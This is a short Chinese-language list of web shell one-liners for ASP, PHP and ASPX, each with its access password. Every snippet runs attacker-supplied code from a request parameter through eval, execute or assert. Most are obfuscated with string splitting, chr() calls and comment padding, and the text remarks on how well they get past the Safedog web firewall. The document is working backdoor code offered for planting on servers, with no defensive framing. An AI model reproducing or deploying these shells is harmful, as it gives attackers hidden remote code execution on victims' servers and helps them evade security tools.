ASP系列  
 
<%Y=request("shezhang")%> <%execute(Y)%>
 
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("shezhang"))%>
 
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>（密码是-7）
 
<%execute(request("-7"))%>
 
PHP系列
 
<?php eval($_POST[-7]);?>
 
<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["shezhang"]); ?>
 
<?php $lang = (string)key($_POST);$lang($_POST['shezhang']);?>
 
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['shezhang']);?>
 
<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["shezhang"]);  ?>
 
<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>   

 密码是  -7
 

ASPX系列
ASPX一句话的 过安全狗效果不怎么样
 
不过我认为能支持aspx 百分之8/90支持asp
 
<%@ Page Language = Jscript %>            
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+            
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+            
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval            
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>    密码   -7
 
 
<%@ Page Language="Jscript"%><%eval(Request.Item["shezhang"],"unsafe");%>
 
 
<script language="C#" runat="server">           
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");            
</script>                                                             密码是webadmin